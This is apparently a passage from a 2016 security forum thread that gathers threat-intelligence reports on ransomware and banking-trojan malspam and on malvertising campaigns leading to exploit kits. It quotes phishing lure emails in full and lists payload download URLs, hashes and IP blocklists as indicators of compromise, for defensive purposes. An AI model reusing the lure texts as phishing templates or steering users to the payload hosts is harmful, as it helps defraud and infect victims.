multibrandphone .com
sappmtraining .com
shirongfeng .cn
vtechshop .net "
___

Malvertising Magnitude ...
- https://labsblog.f-s...de-exploit-kit/
Mar 7, 2016 - "... we noticed yet another malvertising campaign... pushing users towards Magnitude exploit kit:
> https://newsfromthel...png?w=752&h=367
... we found with one of the ad platforms, click2.danarimedia .com, is that, it is also being used by some distribution of Conduit Toolbars, which is considered 'potentially unwanted' as they usually come bundled with free software and -forces- changes to browser settings... The -redirection- from our upstream from the -same- ad platform to Magnitude EK... we should not underestimate the power of Potentially Unwanted Applications (PUA). Because even if a program started as potentially unwanted, it doesn’t mean that attackers could not take advantage of it in delivering other threats to the user’s machine. It is very possible that users could get redirected to exploits kits and eventually end up with a malware infection, which is for this particular exploit kit, is a CryptoWall ransomware:
> https://newsfromthel...png?w=799&h=600 "
... -ongoing- today.

click2.danarimedia .com: 199.212.255.138: https://www.virustot...38/information/
199.212.255.137
199.212.255.136
199.212.255.140
199.212.255.139
 

 

Edited by AplusWebMaster, 12 March 2016 - 04:54 PM.

[AplusWebMaster]

FYI...

Fake 'Blocked Transaction' SPAM - leads to Teslacrypt
- http://blog.dynamoo....ction-case.html
14 Mar 2016 - "This -fake- financial transaction has a malicious attachment:
    From:    Judy brittain
    Date:    14 March 2016 at 08:12
    Subject:    Blocked Transaction. Case No 19706002
    The Automated Clearing House transaction (ID: 19706002), recently initiated from your online banking account, was rejected by the other financial institution.
    Canceled ACH transaction
    ACH file Case ID: 09293
    Transaction Amount: 607,89 USD
    Sender e-mail: brittainJudy056@ panick .com.ar
    Reason of Termination: See attached statement

The sender's name, references and dollar amounts vary from message to messages. The attachment names are randomly-generated (the format seems the same as this*) containing either one-or-four malicious scripts. According to this analysis** the scripts download from:
ohelloguyzzqq .com/85.exe?1
Although the infection mechanism seems the same as this spam run*, the MD5 of the dropped executable is now 57759F7901EBA73040597D4BA57D511A with a detection rate of 2/55***. This is Teslacrypt ransomware, and I recommend that you block traffic to the IP addresses listed here*."
* http://blog.dynamoo....tomer-case.html

** https://www.hybrid-a...environmentId=1

*** https://www.virustot...sis/1457945732/
___

Fake 'Credit details' SPAM - leads to Teslacrypt
- http://blog.dynamoo....d-87320357.html
14 Mar 2016 - "So many -Teslacrypt- campaigns, so little time...
From:    Ladonna feather
Date:    14 March 2016 at 14:50
Subject:    Credit details ID: 87320357
Your credit card has been billed for $785,97. For the details about this transaction, please see the ID: 87320357-87320357 transaction report attached.
NOTE: This is the automatically generated message. Please, do not reply.

... names, references and attachment names vary.. malicious scripts in the attachment...
This is Teslacrypt ransomware...
Recommended blocklist:
54.212.162.6: https://www.virustot....6/information/
212.119.87.77: https://www.virustot...77/information/
78.135.108.94: https://www.virustot...94/information/
washitallawayff .com: 31.128.86.113
176.8.242.205
94.143.247.194
174.118.252.36
46.185.13.41
92.52.181.125
93.123.236.46
213.111.147.60
37.1.3.115
77.122.205.79
___

Fake 'IMG from Admin' SPAM - JS malware leads to locky or Dridex
- https://myonlinesecu...ocky-or-dridex/
14 Mar 2016 - "An email with the subject of 'Emailing: IMG_18977' [random numbered] pretending to come from admin-at-your-own-email-domain with a zip attachment is another one from the current bot runs which downloads what looks like either Locky ransomware or Dridex banking Trojan... The email looks like:
From: admin  admin@ victim domain .tld
Date: Mon 14/03/2016 12:14
Subject:  Emailing: IMG_18977
Attachment: IMG_18977.zip
    Your message is ready to be sent with the following file or link attachments:
    IMG_18977
    Note: To protect against computer viruses, e-mail programs may prevent sending or receiving certain types of file attachments. Check your e-mail security settings to determine how attachments are handled.
    Please consider the environment before printing this email.
    E-mail messages may contain viruses, worms, or other malicious code. By reading the message and opening any attachments, the recipient accepts full responsibility for taking protective action against such code. Henry Schein is not liable for any loss or damage arising from this message...

14 March 2016: IMG_18977.zip: Extracts to: ICG8994683408.js - Current Virus total detections 4/56*
... unable to get any analysis from automatic analysers, both MALWR and Hybrid analysis are down at the moment... Manual analysis of the javascript file shows it connects to
 http ://lampusorotmurah .com/system/logs/78tgh76.exe (VirusTotal 3/57**) which is inclusive but is likely to be either Dridex banking Trojan or Locky ransomware... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457961662/

** https://www.virustot...sis/1457962014/

lampusorotmurah .com: 72.34.33.170: https://www.virustot...70/information/
>> https://www.virustot...d52f8/analysis/
___

Fake 'blank email' SPAM - JS malware downloads kovter boaxxe and ransomware
- https://myonlinesecu...and-ransomware/
14 Mar 2016 - "An email addressed to 'abuse' at your-email-domain with -no- subject coming from Support <support@ hvp-online .com> with a zip attachment is another one from the current bot runs... The email looks like:
From: Support <support@ hvp-online .com>
Date: Mon 14/03/2016 08:51
Subject: blank
Attachment: 0000783426.zip

Body content: Totally empty

14 March 2016: 0000783426.zip: Extracts to: 0000783426.doc.js - Current Virus total detections 13/57*  
.. ReverseIt** and Wepawet*** shows a download of -3- files from a combination of these locations which will be Boaxxe, Kovter and some sort of ransomware:
    nueva.alite .eu
    arbasal .com
    app.ulled .com
    norbert.thecua.perso .sfr.fr
    diarga.fall.perso.neuf .fr
... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457947548/

** https://www.reverse....environmentId=4
Host Address
91.142.215.21
87.106.240.27
217.111.217.243
86.65.123.70
173.201.146.128

*** https://wepawet.isec...18e9511&type=js
___

Fake 'Traffic Violation' SPAM - leads to Teslacrypt
- http://blog.dynamoo....d-62699928.html
14 Mar 2016 - "This -fake- legal email has a malicious attachment:
    From:    Myrna baker
    Date:    14 March 2016 at 15:58
    Subject:    Traffic report ID: 62699928
    Dear Citizen,
    We are contacting you on behalf of a local Traffic Violation Bureau.
    Our cameras have detected that the driver of the vehicle associated with your personal number on March 10th, 2016 has committed a violation of the rules with a code: 49757
    Unfortunately, we will have no other option rather than passing this case to the local police authorities.
    Please, see the report with the documents proofs attached for more information on this case.

Details in the email vary from message to message. The payload is Teslacrypt ransomware, as seen in this earlier spam run*."
* http://blog.dynamoo....d-87320357.html

- https://myonlinesecu...-to-ransomware/
14 March 2016: post_scan_02271147.zip: Extracts to: accent_nUIboL.js - Current Virus total detections 4/56*  reverseIT** shows a download of what is probably Teslacrypt from
 giveitallhereqq .com/69.exe?1 (VirusTotal 4/56***)
* https://www.virustot...sis/1457965942/

** https://www.hybrid-a...environmentId=1
Host Address
54.212.162.6: https://www.virustot....6/information/
>> https://www.virustot...5f869/analysis/

*** https://www.virustot...sis/1457974614/
TCP connections
198.1.95.93: https://www.virustot...93/information/
___

Fake 'Debt#' SPAM - JS malware leads to Teslacrypt
- https://myonlinesecu...-to-teslacrypt/
13 Mar 2016 - "An email with the subject of 'Debt #80574, Customer Case Nr.: 693' [random numbered] coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads what looks like Teslacrypt... The email looks like:
From: Tanya best <bestTanya09673@ bezeqint .net>
Date: Sun 13/03/2016 16:14
Subject: Debt #80574 , Customer Case Nr.: 693
Attachment: money_44821787.zip
Body content:
    Dear Customer,
    Despite our constant reminders, we would like to note that the mentioned debt #80574 for $500,74 is still overdue for payment.
    We would appreciate your cooperation on this case and ask you to make the payment as soon as possible.
    Unless the full payment is received by April 1st, 2016 this case will be transferred to the debt collection agency, will seriously damage your credit rating.
    Please, find the attachment enclosed to the letter below.
    We hope on your understanding.
    Kind regards,
    Finance Department
    Tanya best ...

13 March 2016: money_44821787.zip: Extracts to: -4- different named but identical js files by #
Current Virus total detections 1/57*. SecureIT** shows a download of what appears to be Teslacrypt from
 ohelloguyqq .com/70.exe (VirusTotal 4/57***)
JS files from zip I got were Post_Parcel_Label_id00-611695718#.js
Post_Shipment_Label_id00-436290447#.js
Post_Tracking_Label_id00-503290854#.js
Post_Tracking_Label_id00-993809340#.js
... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457889197/

** https://www.reverse....environmentId=4
78.135.108.94: https://www.virustot...94/information/

*** https://www.virustot...sis/1457890122/

- http://blog.dynamoo....tomer-case.html
13 Mar 2016 - "The details in these spam messages vary, with different reference numbers, sender names and dollar amounts. They all have malicious attachments...
From:    Lamar drury
Date:    13 March 2016 at 18:43
Subject:    Debt #85533 , Customer Case Nr.: 878
Dear Customer,
Despite our constant reminders, we would like to note that the mentioned debt #85533 for $826,87 is still overdue for payment.
We would appreciate your cooperation on this case and ask you to make the payment as soon as possible.
Unless the full payment is received by April 1st, 2016 this case will be transferred to the debt collection agency, will seriously damage your credit rating.
Please, find the attachment enclosed to the letter below.
We hope on your understanding.
Kind regards,
Finance Department
Lamar drury ...

Attached is a ZIP file... plus a random number. Inside are one-to-four malicious .js scripts... There are at least -22- unique scripts... These appear [1] [2] to download a malicious binary from one of the following locations:
ohelloguyff .com/70.exe
ohelloguyzzqq .com/85.exe?1
Of these, only the 85.exe download is working for me at the moment which is Teslacrypt ransomware. This has a detection rate of just 1/56*... Recommended blocklist:
185.35.108.109
204.44.102.164
54.212.162.6
192.210.144.130
212.119.87.77
78.135.108.94 "

1] https://www.hybrid-a...environmentId=4

2] https://www.hybrid-a...environmentId=1

* https://www.virustot...sis/1457899296/
___

Apple Store Support Ticket #35652467 – Apple PHISH
- https://myonlinesecu...ple-phish-fail/
14 Mar 2016 - "An email pretending to come from 'App Store Billing #7221' <apple.id3627@ applemarketingpro .com> is one of the latest -phish- attempts to -steal- your Apple and bank/credit card details...

Screenshot: https://myonlinesecu...il-1024x625.png

The link in the email -if- you did copy & paste the link into a browser window -redirects- to another dyndns link where you would see a webpage looking like this where they want a lot of details and have gone to a lot of effort to validate the forms and stop obvious fake information being put in:
> https://myonlinesecu...nd-1024x557.png
The links behind the 'unsubscribe' and 'Click-here-to-view-our-privacy-policy' lead you to the Romanian Security Team forum. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

applemarketingpro .com: 174.35.126.195: https://www.virustot...95/information/
 

 

Edited by AplusWebMaster, 14 March 2016 - 12:56 PM.

[AplusWebMaster]

FYI...

Malvertising Campaign... Leads to Angler Exploit Kit/BEDEP
- http://blog.trendmic...ploit-kitbedep/
Updated Mar 15, 2016 - "A malvertising campaign related to the Angler Exploit Kit is currently targeting users in the United States and may have affected tens of thousands of users in the last 24 hours alone. Based on our monitoring, the malicious ads were delivered by a compromised-ad-network in various highly-visited mainstream websites–including news, entertainment, and political commentary sites. As of this writing, while the more popular portals appear to be no longer carrying the bad ad, the malvertising campaign is still ongoing and thus continues to put users at risk of downloading malware into their systems... Users and organizations are advised to make sure that keep their applications and systems up-to-date with the latest security patches; Angler Exploit Kit is known to exploit vulnerabilities in Adobe Flash and Microsoft Silverlight, among others..."
(More detail at the trendmicro URL above.)

- https://blog.malware...top-publishers/
Mar 15, 2016 - "... on the weekend we witnessed a huge spike in malicious activity emanating out of two suspicious domains. Not only were there a lot of events, but they also included some very high profile publishers, which is something we haven’t seen in a while:
Publisher     Traffic (monthly)[1]
msn .com     1.3B
nytimes .com     313.1M
bbc .com     290.6M
aol .com     218.6M
my.xfinity .com 102.8M
nfl .com     60.7M
realtor .com     51.1M
theweathernetwork .com     43M
thehill .com     31.4M
newsweek .com     9.9M

1] Numbers pulled from SimilarWeb .com
... Rogue domains:
Domain Name: TRACKMYTRAFFIC .BIZ: 104.28.18.116: https://www.virustot...16/information/
104.28.19.116: https://www.virustot...16/information/
>> https://www.virustot...35230/analysis/
Domain Name: TALK915 .PW: 104.27.191.84: https://www.virustot...84/information/
104.27.190.84: https://www.virustot...84/information/
>> https://www.virustot...30128/analysis/
... On Sunday, when the attack really expanded, the Angler exploit kit was then used... Angler EK has gone through several changes lately, in its URI patterns but also in the landing page itself. It is also the only one to use a recently patched Silverlight vulnerability*... the actual malware payload in each of these attacks, chances are quite high that it would be one of the several strains of ransomware currently out there..."
* http://malware.dontn...-2016-0034.html
(More detail at the malwarebytes URL above.)
___

Fake 'Insufficient Funds' SPAM - JS malware leads to Teslacrypt
- https://myonlinesecu...-to-teslacrypt/
15 Mar 2016 -"... an email with the subject of 'Insufficient Funds Transaction ID:12719734' [random numbered]  coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Teslacrypt... The email looks like:
From: Random names & email addresses
Date: Tue 15/03/2016 06:29
Subject: Insufficient Funds Transaction ID:12719734
Attachment: money_12719734.zip
    Dear Valued Customer,
    Your transaction 12719734 dated on 13/03/2016 4:24 PM was declined due to insufficient funds on your account.
    For more details please refer to the report enclosed.
    Thank you!

15 March 2016: money_12719734.zip: Extracts to: details_sESWjv.js
 | access_21202865.zip: Extracts to: details_AdbdeE.js - Current Virus total detections  [1] [2]:
.. MALWR [3] [4] shows a download of what looks like Teslacrypt from
 http ://giveitalltheresqq .com/80.exe?1 or http ://giveitalltheresqq .com/69.exe?1 VirusTotal [5] ...
... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
1] https://www.virustot...sis/1458027607/

2] https://www.virustot...sis/1458027607/

3] https://malwr.com/an...WMzNGEyNDA0YTQ/
Hosts
54.175.175.52: https://www.virustot...52/information/
>> https://www.virustot...b9ca7/analysis/
>> https://www.virustot...13f7e/analysis/
107.180.50.183: https://www.virustot...83/information/

4] https://www.virustot...sis/1458027237/

5] https://www.virustot...sis/1458027237/
___

Fake 'my photo' SPAM - fake jpg malware
- https://myonlinesecu...ke-jpg-malware/
15 Mar 2016 - "... An email with the subject of 'photo,my photo,image,pic' pretending to come from lyle.house@ hotmail .co.uk (probably random addresses) with a zip attachment is another one from the current bot runs... The email looks like:
From: lyle.house@ hotmail .co.uk
Date: Tue 15/03/2016 10:52
Subject: photo,my photo,image,pic
Attachment: IMG_0024415_02-2016 JPG.zip
    photo Sent from my iPhone

The link behind photo goes to https ://www.dropbox .com/s/5eaj5qwy9yz3xmo/IMG_0024415_02-2016%20JPG.zip?dl=0  where a zip file is downloaded. I am unable to find an abuse report for dropbox to alert them...
15 March 2016: IMG_0024415_02-2016 JPG.zip: Extracts to: IMG_0024415_02-2016 JPG,jpeg.exe
 Current Virus total detections 4/57*  MALWR** - The detections are inconclusive...
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper jpg ( image) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458039815/
TCP connections
87.117.242.31: https://www.virustot...31/information/
13.107.4.50: https://www.virustot...50/information/

** https://malwr.com/an...TY5NTU0NTdiYmI/
Hosts
87.117.242.31
13.107.4.50
___

Fake 'Document Enclosed' SPAM - fake PDF malware
- https://myonlinesecu...ke-pdf-malware/
15 Mar 2016 - "... An email with the subject of 'Document Enclosed' pretending to come from Ka2521@ hotmail .co.uk with a zip attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...ed-1024x426.png

15 March 2016: INV.P10119.03.2016.XML.zip: Extracts to:  INV.P10119.03.2016.XML.PDF,.exe
  Current Virus total detections 4/57* which is the -same- malware as described in this other Malspam run**.
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458039815/
TCP connections
87.117.242.31
13.107.4.50

** https://myonlinesecu...ke-jpg-malware/
___

Fake 'Itinerary' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
15 Mar 2016 - "An email with the subject of 'Itinerary #13B0B450E' [random numbered] pretending to come from no-reply@ clicktravel .com  with a zip attachment is another one from the current bot runs which downloads Locky ransomware...

Screenshot: https://myonlinesecu...0E-1024x382.png

15 March 2016: Hotel-Fax-V004X3R8_4983252052512314320.zip: Extracts to: USH3121122904.js
 Current Virus total detections 5/57* - MALWR** shows a download of Locky ransomware from
 http ://flaxxup .com/87yg756f5.exe (VirusTotal 3/56***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458040913/

** https://malwr.com/an...Dg4Y2I4ODcyMzA/
Hosts
98.131.204.1: https://www.virustot....1/information/
51.254.181.122: https://www.virustot...22/information/

*** https://www.virustot...sis/1458039440/
TCP connections
37.139.27.52: https://www.virustot...52/information/
149.202.109.205: https://www.virustot...05/information/
___

Dropbox spreading malware via spoofed emails about orders – fake PDF malware
- https://myonlinesecu...ke-pdf-malware/
16 Mar 2016 - "... from these earlier malspam runs [1] [2] we now have a series of emails with the basic subject of 'orders' pretending to come from different companies with a -link- to Dropbox to download a zip attachment... another one from the current bot runs... The email looks like:
From: admin@ t-mobile .de
Date: Tue 15/03/2016 13:02
Subject: Fwd: INVOICE – Your Order from Sports
Attachment: 9937700846-001.PDF.zip
    Order Details
    Order Number: 31860 Date Ordered: Tuesday 15 March, 2016 Order In Progress If you have any questions or queries regarding your order please contact us

Some of the subjects and alleged senders seen so far include:
    'Fwd: INVOICE – Your Order from Sports' pretending to come from admin@ t-mobile .de
    'order 15/03/2016' pretending to come from benelle@ bt .com
    'Fwd: INVOICE – Your Order' pretending to come from wdcabs1@ gmail .com
All -three- of these emails have the -same- body content and the -same- link-to-Dropbox to download the malware https ://www.dropbox .com/s/gckssj2hhyrfo2u/9937700846-001.PDF.zip?dl=0
> https://myonlinesecu...re-1024x541.png
There are no abuse links or method of reporting malware, only to report DCMA and copyright infringements, by the tiny flag in bottom left corner...
15 March 2016: 9937700846-001.PDF.zip : Extracts to: 9937700846-001.PDF.exe
.. Current Virus total detections 5/56* which is exactly the -same- malware as described in the earlier malspam runs**... These are spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."  
1] https://myonlinesecu...ke-pdf-malware/

2] https://myonlinesecu...ke-jpg-malware/

* https://www.virustot...sis/1458046592/
TCP connections
87.117.242.31: https://www.virustot...31/information/
13.107.4.50: https://www.virustot...50/information/

** https://myonlinesecu...ke-jpg-malware/
___

Documents with malicious macros deliver fileless malware to financial-transaction systems
- http://www.csoonline...on-systems.html
Mar 14, 2016 - "Spammed Word documents with malicious macros have become a popular method of infecting computers over the past few months. Attackers are now taking it one step further by using such documents to deliver fileless malware that gets loaded directly in the computer's memory. Security researchers from Palo Alto Networks analyzed a recent attack campaign that pushed spam emails with malicious Word documents to business email addresses from the U.S., Canada and Europe... 'Due to the target-specific details contained within the spam emails and the use of memory-resident malware, this particular campaign should be treated as a high threat', the Palo Alto researchers said in a blog post*..."
* http://researchcente...-based-attacks/
Mar 11, 2016 - "... users should ensure that macros are -not- enabled by default and should be wary of opening -any- macros in files received from untrusted sources..."
 

  

Edited by AplusWebMaster, 15 March 2016 - 01:04 PM.

[AplusWebMaster]

FYI...

Fake 'Your order' SPAM - doc malware delivers Dridex
- https://myonlinesecu...-macro-malware/
16 Mar 2016 - "An email saying 'Thank you for shopping with 365 Electrical' with the subject of 'Your order summary from 365 Electrical. Order number: 93602'  (random numbers) coming from random names and email addresses  with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: random names and email addresses
Date: Wed 16/03/2016 10:29
Subject: Your order summary from 365 Electrical. Order number: 93602
Attachment: Sales Order Document for Emailing_140603632941_1752380.doc
    Dear customer,
    Thank you for shopping with 365 Electrical. This is to acknowledge that we’ve received your order (see attached document). Please note that acceptance of your order takes place when the goods are loaded onto one of our vehicles for delivery to you.
    Your order number is 93602.
    Please read the following important information:
    Damaged Goods: Must be reported within 48 hours of delivery date with photographic evidence. Do not install any damaged or unwanted items. This counts as acceptance of goods and the item is then non-returnable and non-refundable.
    Delivery Timeslots: You must ensure that you can be available all day on your chosen day of delivery; if you find you cannot keep to the delivery date you must notify us before 12 noon one working day before...
    Thank you,
    365 Electrical

16 March 2016: Sales Order Document for Emailing_140603632941_1752380.doc - Current Virus total detections 1/57*
.. MALWR** shows a download from http ://api.holycrossservices .com/dri/donate.php which gave me
 crypted120med.exe (VirusTotal 4/56***). This looks like Dridex banking Trojan.. DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458123902/

** https://malwr.com/an...DE2ZWQyMGY2YTM/
Hosts
176.103.56.36
188.93.239.28
184.27.46.153

*** https://www.virustot...sis/1458124624/
TCP connections
188.93.239.28: https://www.virustot...28/information/
88.221.14.11: https://www.virustot...11/information/
___

Fake 'Unpaid Invoice' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
16 Mar 2016 - "An email with the subject of 'Unpaid Invoice' pretending to come from Dave.Maule@ tiscali .co.uk ( probably random) with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: Dave.Maule@ tiscali .co.uk
Date: Wed 16/03/2016 11:08
Subject: Unpaid Invoice
Attachment: original invoice feb2016.doc
    I noticed that your invoice is overdue by 25 days and wanted to reach out to make sure that you received our original invoice and my reminder email on 02/16.
    You can pay us by CC, direct deposit or with a check.
    If you have any questions, please let us know and we’d be happy to respond.
    Warm Regards,
    A Cooper

16 March 2016: original invoice feb2016.doc -  Current Virus total detections 23/57*
.. Waiting for analysis. This is highly likely to download either Dridex banking Trojan or Locky ransomware... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458127451/
___

Fake 'Document1' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
16 Mar 2016 - "A -blank/empty- email with the subject of 'Document1' pretending to come from your own email address and sent to your own email address with a zip attachment is another one from the current bot runs which downloads Locky ransomware... The email looks like:
From: your own email address
Date: Wed 16/03/2016 11:58
Subject: Document1
Attachment: Document1.zip

Body content: totally -blank-

16 March 2016: Document1.zip: Extracts to: CDF6840557603.js - Current Virus total detections 5/57*
.. MALWR** shows a download of Locky ransomware from
 http ://winjoytechnologies .com/v4v5g45hg.exe (VirusTotal 1/56***) which is a -different- Locky binary from this earlier malspam run[1]... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458129749/

** https://malwr.com/an...jhiZGNmYzRjMTQ/
Hosts
192.185.37.228: https://www.virustot...28/information/
91.195.12.187: https://www.virustot...87/information/

*** https://www.virustot...sis/1458129716/
TCP connections
91.195.12.187

1] https://myonlinesecu...ridex-or-locky/
___

Fake 'Bestellung' SPAM - JS malware leads to ransomware
- https://myonlinesecu...ridex-or-locky/
16 Mar - "An email written partly in English -and- partly in German supposedly from Buhler group with the subject of 'Bestellung 69376' [random numbered] pretending to come from  david.favella654@ buhlergroup .com (-random- numbers after david.favella) with a zip attachment is another one from the current bot runs... Update: I am reliably informed this is Locky ransomware not Dridex... The email looks like:
From: david.favella654@ buhlergroup .com
Date: Wed 16/03/2016 10:03
Subject:Bestellung 69376
Attachment: Bestellung Bestellung 69376.zip
    Sehr geehrte Damen und Herren,
    anbei erhalten Sie unsere Bestellung. Diese ist maschinell erstellt und ist daher ohne Unterschrift gültig.
    Dear ladies and gentlemen,
    enclosed you receive our order. This order has been created automatically and is valid without signature.
    Mit freundlichen Grüßen / Best regards ...

16 March 2016: Bestellung Bestellung 69376.zip: Extracts to: BOY8641744807.js
 Current Virus total detections 6/57*.. MALWR** shows a download of Locky ransomware from
 http ://vital4age .eu/v4v5g45hg.exe (VirusTotal 0/57***).. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458127067/

** https://malwr.com/an...TY0ZTFiMjhjMGM/
Hosts
85.13.152.231: https://www.virustot...31/information/
>> https://www.virustot...5f427/analysis/

*** https://www.virustot...sis/1458127276/
TCP connections
149.202.109.205: https://www.virustot...05/information/
91.195.12.187: https://www.virustot...87/information/
___

Fake 'Order status updated' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
16 Mar 2016 - "An email with the subject of 'RE: MINERAL & FINANCIAL INVESTMENTS LTD – Order Number 89785/682352/15 status updated to order processing' pretending to come  from random names and email addresses with a malicious word doc attachment is another one from the current bot runs... This mass malspam run has a subject that looks like 'RE: [random company name] – Order Number [random number] status updated to order processing'. The attachment names are based on the company name in the subject and include:
    CML MICROSYSTEMS – Order NUM. 09725_866338_23.doc
    MINERAL & FINANCIAL INVESTMENTS LTD – Order NUM. 57691_396874_45.doc
    MXC CAPITAL PLC – Order NUM. 80048_534442_26.doc
    ROSSETI JSC – Order NUM. 39475_569330_86.doc
Some subjects include:
    RE: MINERAL & FINANCIAL INVESTMENTS LTD – Order Number 89785/682352/15 status updated to order processing
    RE: CML MICROSYSTEMS – Order Number 09725/866338/23 status updated to order processing
    RE: ROSSETI JSC – Order Number 39475/569330/86 status updated to order processing
    RE: MXC CAPITAL PLC – Order Number 80048/534442/26 status updated to order processing
One example email looks like:
From: Horton.Elena9@ incrcc .org
Date: Wed 16/03/2016 13:34
Subject:  RE: MINERAL & FINANCIAL INVESTMENTS LTD – Order Number 89785/682352/15 status updated to order processing
Attachment: MINERAL & FINANCIAL INVESTMENTS LTD – Order NUM. 57691_396874_45.doc
    Dear customer,
    First of all thank you for purchasing with us.
    We want to let you know that your order 89785/682352/15 status has been updated to ORDER PROCESSING
    If you have any questions about your order, send an email to sales@fromdomain qouting your order number 89785/682352/15 or simply reply to this message.
    Your unique reference: Your order number listed above.
    MINERAL & FINANCIAL INVESTMENTS LTD
    You can download and view a copy of your invoice from the attached document...

16 March 2016: MINERAL & FINANCIAL INVESTMENTS LTD – Order NUM. 57691_396874_45.doc
.. Current Virus total detections 1/57*..

Update: a resubmission to MALWR** got a download from http ://api.kairoshealthcare .org/dri/donate.php
which gave freshmeat.exe (VirusTotal 4/56***) which appears to ebb an -updated- Dridex binary although also using the same download locations from this earlier Malspam run[4]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458134954/

** https://malwr.com/an...TJkN2ZmYzUzNGU/
Hosts
213.159.214.241: https://www.virustot...41/information/
188.93.239.28
13.107.4.50

*** https://www.virustot...sis/1458137759/
TCP connections
188.93.239.28: https://www.virustot...28/information/
>> https://www.virustot...b5c4b/analysis/
13.107.4.50: https://www.virustot...50/information/

4] https://myonlinesecu...-macro-malware/
___

Malvertising Attacks Targeting The UK
- https://blog.malware...rgeting-the-uk/
Mar 16, 2016 - "We recently stumbled upon a -malvertising- incident on a large British newspaper site which we decided to investigate in greater details. As with many attacks we have found lately, the line between legitimate advertisers and rogue ones is getting finer and finer. Indeed, in many cases ad networks simply cannot tell them apart without actual proof of malicious activity... Malvertising Flow:
    dailymail .co.uk
    adclick.g.doubleclick .net
    track.bridge .systems (Russian RTB?)
    cdn.exeterquads .com (Fake ad server)
    geraeuschvollste.ciderstore .co.uk (Angler EK landing)
At first sight, exterquads .com looks like a legitimate business (which it is) located in the UK. However, the subdomain (the ‘cdn‘ preceding the main domain) was registered via criminals who managed to steal the registrant’s credentials in order to create a rogue URL that points to their own server. This is called 'domain shadowing'*.
Legitimate domain:
Hostname: exeterquads .com
IP address: 5.196.39.216
Running on: Microsoft-IIS/8.5
Rogue (shadowed) sub-domain:
Hostname: cdn.exeterquads .com
IP address: 5.63.145.76: https://www.virustot...76/information/
Running on: nginx/1.0.15
The crooks also -stole- the graphics from this legitimate business to create an ad banner which looks rather convincing but is meant to be a -decoy- for the real motivation behind this attack. Indeed, alongside the banner, an innocuous 1×1 pixel image is served (supposedly for tracking purposes). This is where 'fingerprinting' happens. The -rogue- code hiding in the image can be decoded to reveal a nefarious intent to identify real victims and eliminate those running security tools, the latter being of no interest to the criminals:
> https://blog.malware...016/03/flow.png
The final part of this rogue code is to launch the exploit kit URL, which for all these campaigns has been Angler EK. Because this campaign was aimed at people living in the UK, we searched for additional rogue advertisers abusing other businesses. We found quite a handful of them that have been used in recent attacks... one way to determine whether an advertiser is legit is by checking the domain info and seeing if there are any discrepancies between the main domain and sub-domain. Also, many of those rogue-subdomains use free-SSL-certificates, while the core domain doesn’t... The UK malvertising campaign is of a rather large size, just after the US one. We have also spotted specific campaigns targeting Canadians, Australians and the French with a similar modus operandi. The amount of work spent -forging- legitimate brands and advertising under such disguise is really astonishing. We managed to get in touch with one company whose brand had been abused and they clearly were none the wiser when asked whether they were aware of this ad banner residing on a sub-domain. However, they managed to find out the source of the problem once they talked with their hosting provider... This kind of attack is a reminder of just how many different ways a website can-be-compromised or leveraged to fulfill certain goals. It also shows how difficult it can be for ad networks to -vet- new customers and weed out malicious ones."
* https://www.proofpoi...he-Shadow-Knows
___

Cyber criminals snap up expired domains to serve malicious ads
- http://www.reuters.c...e-idUSKCN0WI2DZ
